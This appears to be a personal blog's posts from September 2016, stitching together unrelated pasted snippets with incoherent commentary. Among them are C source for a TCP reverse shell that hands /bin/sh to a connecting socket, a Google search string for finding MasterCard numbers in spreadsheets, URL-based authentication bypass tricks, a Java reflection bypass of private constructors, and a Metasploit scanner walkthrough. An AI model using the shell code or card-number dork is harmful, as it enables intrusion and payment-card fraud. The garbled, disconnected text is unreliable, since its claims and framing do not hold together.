Sunday, September 4, 2016

You're the top geeks on the world I'm very very proud to have you as my friends, I said this morning to you, I know something you don't know, but I don't remember what it is, Jesus doesn't want to me to remember and doesn't want me to say to you right now; I'm the google cracker :) the first 4 bytes, 4 imput class on a java object must match the firewall code;
"This means making the constructor private or default access ("package-private"), or being in a package controlled by the package.access security property. Immutable classes themselves should declare fields final and protect against any mutable inputs and outputs as described in Guideline 6-2. Construction of immutable objects can be made easier by providing builders (cf. Effective Java [6])."


http://www.oracle.com/technetwork/java/seccodeguide-139067.html#6 


How can I access a private constructor of a class?


One way to bypass the restriction is to use reflections:
import java.lang.reflect.Constructor;

public class Example {
    public static void main(final String[] args) throws Exception {
        Constructor<Foo> constructor = Foo.class.getDeclaredConstructor(new Class[0]);
        constructor.setAccessible(true);
        Foo foo = constructor.newInstance(new Object[0]);
        System.out.println(foo);
    }
}

class Foo {
    private Foo() {
        // private!
    }

    @Override
    public String toString() {
        return "I'm a Foo and I'm alright!";
    }
}

Cisco Crypto ACLs – Do they really need to match?

When starting out with IPsec tunnels it seems to be a common misconception that the crypto ACL, sometimes referred to as the encryption domain or the interesting traffic, must match 100% or be mirrored at both peers or the tunnel won't come up. This isn't strictly true. Whilst the ISAKMP phase 1 and IPsec phase 2 proposals must match, the crypto ACL can be different.
Assume that at the local peer traffic to be encrypted originates from 10.0.0.0/24 and is destined for 192.168.0.0/24. The crypto ACL would be:
But what about the following?
IPsec phase 2 can still be established even though the crypto ACL isn't mirrored at the local and remove peer. The local peer specifies 10.0.0.0/24 but the remote peer specifies 10.0.0.0/8. In this scenario IPsec phase 2 can only be initiated from the peer that has the larger subnet. This is true for both Cisco ASA and IOS.
And in the example above, in the local peer's ACL there's a deny ACE but none on the remote peer's ACL. In this scenario any traffic originating on the local peer from 10.0.0.0/24 destined to 192.168.0.200/32 won't traverse the tunnel. The device (ASA or IOS router) will look at the next crypto map in the sequence and try to match traffic there. If no crypto maps are found it'll flow unencrypted out of the egress interface.
Obviously be careful with mismatching subnets and using deny ACEs in the crypto ACL because you may end up with traffic trying to enter the wrong tunnel and other strange things happening.

https://0wned.it/2014/10/13/cisco-crypto-acls-do-they-really-need-to-match/ 

Saturday, September 3, 2016

this is the tunneling as far as I understand

if (!sync && replicationQueue != null && !usingBuddyReplication)
{
if (log.isDebugEnabled()) log.debug("Putting call " + call + " on the replication queue.");
- replicationQueue.add(commandsFactory.buildReplicateCommand(call));
+// replicationQueue.add(commandsFactory.buildReplicateCommand(call));
}
else
{



and this tricking the "sort of resize byte" for the email to go trought..if you care on understanding me...

a serialized byte[][] array where element 0 is the
- * transient state (or null) , and element 1 is the
- * persistent state (or null)
- * @param targetRoot node into which the state should be integrated
- */
- protected void setState(ObjectInputStream state, NodeSPI targetRoot) throws Exception
- {
- long startTime = System.currentTimeMillis();
- /*
- * Vladimir/Manik/Brian (Dec 7,2006)
- *
- * integrator.integrateState(in,targetRoot, cl) will call cache.put for each
- * node read from stream. Having option override below allows nodes read
- * to be directly stored into a tree since we bypass interceptor chain.
- *

 - */
- if (log.isDebugEnabled())
- log.debug("starting state integration at node " + targetRoot + ". Fetch Persistent State = " + fetchPersistentState);
- integrator.integrateState(state, targetRoot.getDelegationTarget(), targetRoot.getFqn(), fetchPersistentState);
-
- if (log.isDebugEnabled())
- log.debug("successfully integrated state in " + (System.currentTimeMillis() - startTime) + " msec");
- }
-}


How to exclude a computer from SonicWALL Content Filtering Service/ to Allow Specific Email Addresses to Bypass Detection and Prevention by DPI Services

Java Code Examples for org.apache.cassandra.streaming.OperationType

 

 

/**
    * Not multi-threaded intentionally.
    * @return 
    */
   public Collection<PendingFile> stream(File directory) throws IOException, InterruptedException
   {
       Client client = new Client()
       {
           public boolean validateColumnFamily(String keyspace, String cfName)
           {
               return true;
           }

           public void init(String keyspace)
           {
           }
       };
       try {
    client.setPartitioner(config.getPartitioner());
} catch (Exception e) {
    logger.error("Configuration Exception while setting partitioner", e);
}
       
       
       SSTableLoader loader = new SSTableLoader(directory, client, options);       
       
       Collection<PendingFile> pendingFiles = Lists.newArrayList();
       for (SSTableReader sstable : loader.openSSTables())
       {
           Descriptor desc = sstable.descriptor;
           List<Pair<Long, Long>> sections = Lists.newArrayList(Pair.create(0L, sstable.onDiskLength()));
           PendingFile pending = new PendingFile(sstable, desc, SSTable.COMPONENT_DATA, sections, OperationType.BULK_LOAD);
           StreamHeader header = new StreamHeader(directory.getName(), UUID.randomUUID(), pending, Collections.singleton(pending));
           logger.info("Streaming to {}", InetAddress.getLocalHost());
           new FileStreamTask(header, InetAddress.getLocalHost()).run();
           logger.info("Done Streaming: " + pending.toString());
           sstable.releaseReference();
           pendingFiles.add(pending);
       }
       return pendingFiles;
   }
 
http://www.programcreek.com/java-api-examples/index.php?api=org.apache.cassandra.streaming.OperationType




A simple example of this is when a simple parameter is appended to the end of a URL.
For example, imagine a system that uses a parameter "auth" to signify if a user has been authenticated, and prompts for the log in procedure if auth=0, switching it to auth=1 once a successful login has taken place. As long as auth=1, the user remains authenticated and able to access restricted pages.
Trying to get to a restricted page, a user's browser might submit:
http://www.mycorporatewebapp.com/remotemanagement.asp?auth=0
Bypassing this authentication might then be as simple as changing auth=0 to auth=1.
he question that hackers ask is whether there are alternative URLs, which are not on the "restricted list", which point to the same restricted pages? or example, imagine a restricted
Web page: http://mycorporatedevice/admin/configuration/
What if a hacker were to append an extra "/" at the end of this URL:
http://mycorporatedevice/admin/configuration//
or add some other character like "?" or "%" or "~"? In some cases these URLs are effectively equivalent, even though they look different. If the authentication mechanism only checks for the original URL but not the variations then it can easily be bypassed.

 

http://www.w4rri0r.com/attacker-surface/bypass-authentication.html 

"After identifying an individual Tor user on the Internet, the NSA uses its network of secret Internet servers to redirect those users to another set of secret Internet servers, with the codename FoxAcid, to infect the user's computer. FoxAcid is an NSA system designed to act as a matchmaker between potential targets and attacks developed by the NSA, giving the agency opportunity to launch prepared attacks against their systems. Once the computer is
successfully attacked, it secretly calls back to a FoxAcid server, which then performs additional attacks on the target computer to ensure that it remains compromised long-term, and continues to provide eavesdropping information"

Friday, September 2, 2016

https://ssl-tools.net/subjects/e7283e531dbea071ab46d31bc35076989a9795a5

emsm-gh1-uea10.nsa.gov

C=US
O=U.S. Government
OU=DoDPKINSA/CSS
CN=emsm-gh1-uea10.nsa.gov
Fingerprints: d9fcc417c2
Issuer:
DOD ID SW CA-37
Serial:
12177
Not valid before:
2016-04-12 14:40­:26 UTC
Not valid after:
2019-04-13 14:40­:26 UTC
Key size:
2048
Signature Algorithm:
sha256WithRSAEnc­ryption
authorityKeyIdentifier:
keyid:16:24:7E:F­7:2D:C1:EF:92:3F­:BE:44:E7:54:5E:­E9:FE:17:BA:F3:A­1
subjectKeyIdentifier:
53:D9:A5:2D:B9:A­C:82:A0:F3:12:59­:BE:C5:5B:A9:63:­D6:81:83:25
authorityInfoAccess:
CA Issuers - URI­:http://crl.disa­.mil/sign/DODIDS­WCA_37.cer­OCSP - URI:http:­//ocsp.disa.mil
keyUsage:
Digital Signatur­e, Key Encipherm­ent
crlDistributionPoints:
Full Name:­ URI:http://crl­.disa.mil/crl/DO­DIDSWCA_37.crl
subjectAltName:
DNS:emsm-gh1-uea­10.nsa.gov
certificatePolicies:
Policy: 2.16.840­.1.101.2.1.11.39
extendedKeyUsage:
TLS Web Server A­uthentication, T­LS Web Client Au­thentication, 1.­3.6.1.5.5.8.2.2

Certificates

Fingerprint Issuer Serial Public Key Download Tools
d9fc­c417­c29a­037d­ac90­aea5­f178­e91d­59ec­9862DOD ID SW CA-371217­7d9fcc417c2

Create shellcode for a tcp reverse shell (SLAE)

shell_reverse_tcp.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include
#include
#include
#include
#include
#include
#include
 
int main(void) {
    int sockfd;         // file descriptor for socket
    int lportno = 12345;    // listener port
    struct sockaddr_in serv_addr; // {2,str[14]}
    char *const params[] = {"/bin/sh",NULL};
    char *const environ[] = {NULL};
 
    sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    serv_addr.sin_family = AF_INET; // 2
    serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); // localhost
    serv_addr.sin_port = htons(lportno);  // little endian
    connect(sockfd, (struct sockaddr *) &serv_addr, 16);
    // redirect stdout and stderr
    dup2(sockfd,0); // stdin
    dup2(0,1); // stdout
    dup2(0,2); // stderr
    execve("/bin/sh",params,environ);

 
 
 
YOU NEED TO KNOW WHERE TO GO:
 
 

endpoint_mapper

The endpoint_mapper module queries the EndPoint Mapper service of a remote system to determine what services are available. In the information gathering stage, this can provide some very valuable information.
msf > use auxiliary/scanner/dcerpc/endpoint_mapper 
msf auxiliary(endpoint_mapper) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    135              yes       The target port
   THREADS  1                yes       The number of concurrent threads
In order to run the module, all we need to do is pass it a range of IP addresses, set the THREADS count, and let it go to work.

https://www.offensive-security.com/metasploit-unleashed/scanner-dcerpc-auxiliary-modules/ 

Server signature , how to get it ?

Server signature is now available for everyone, i'll just show with pictures where to get it and how to use it.
Thats pretty simple.

Go to serverlist , choose the server you are interested in , check bottom infos to get the signature code.
(click on the picture to see fullsize)



Once you clicked on server signature you should get this :



Copy the code & insert it to your signature for example , using the " Insert Image" function

Which gives :



Tips : select your image(double click on it) then add a link example : http://et.trackbase.net/server/41109/
So if you click on your signature , you are redirected to your server page.

Just add two numbers, separated by two periods, with no spaces, into the search box along with your search terms. "mastercard 0..9999999999999999 filetype:xls"

should he place xls..or xks ...
I don't think is going to find nothing xls...because that is of course offline...so he needs a java reader ONLINE tool




Doxygen

Generate documentation from source code

Doxygen is the de facto standard tool for generating documentation from annotated C++ sources, but it also supports other popular programming languages such as C, Objective-C, C#, PHP, Java, Python, IDL (Corba, Microsoft, and UNO/OpenOffice flavors), Fortran, VHDL, Tcl, and to some extent D.
Doxygen can help you in three ways:
  1. It can generate an on-line documentation browser (in HTML) and/or an off-line reference manual (in $\mbox{\LaTeX}$) from a set of documented source files. There is also support for generating output in RTF (MS-Word), PostScript, hyperlinked PDF, compressed HTML, and Unix man pages. The documentation is extracted directly from the sources, which makes it much easier to keep the documentation consistent with the source code.
  2. You can configure doxygen to extract the code structure from undocumented source files. This is very useful to quickly find your way in large source distributions. Doxygen can also visualize the relations between the various elements by means of include dependency graphs, inheritance diagrams, and collaboration diagrams, which are all generated automatically.
  3. You can also use doxygen for creating normal documentation (as I did for the doxygen user manual and web-site).
Doxygen is developed under Mac OS X and Linux, but is set-up to be highly portable. As a result, it runs on most other Unix flavors as well. Furthermore, executables for Windows are available.

http://www.stack.nl/~dimitri/doxygen/ 


Google Hacking Database (GHDB)

Search the Google Hacking Database or browse GHDB categories

https://www.exploit-db.com/google-hacking-database/ 

Thursday, September 1, 2016

TODAY WE ARE SETTING A GAME...

ConfigGenerator

The ConfigGen utility can be used as an aid in setting the device configuration fuse settings.
Unzip the utility and place the file ConfigGen.exe in a directory of your choice. The software uses the MPASM '8bit_device.info' file as the source of its information, and can be set to use the MPASM, MPASMX, or Swordfish copy.
Config Generator Software
Make sure the software is pointing to the MPASM, MPASMX, or Swordfish Bin installation folder. If it is not, use the 'Change Folder...' button to point to the location of the file '8bit_device.info'. For MPLAB this is typically "C:\Program Files\Microchip\MPASM Suite" and for MPLABX it's "C:\Program Files\Microchip\MPLABX\mpasmx". Next, press the 'Load File' button. This will open the .info file and build a list of all PIC18 devices contained in it. Select your desired device from the 'Device' dropdown list and it will display all of the config fuses and their default settings.
Clicking the 'Setting' column for a config entry will show a dropdown list with all of the valid selections for that fuse.
When all config settings have been made, click the 'Generate' button and the program will generate source code with all of your selections (the 'Comments' checkbox will remove the descriptions and just leave the settings, if desired).
Selecting 'Copy to Clipboard' will dump the output window contents into the Windows clipboard, which you can then paste into a file using a text editor or the Swordfish IDE using 'Edit | Paste' (or Ctrl-V).
The 'Set Defaults' button will change all the settings back to the defaults provided in the .info file, with the exception of 'XINST', 'DEBUG', 'LVP', and 'IOL1WAY' (if present for the selected device). The program always sets these off.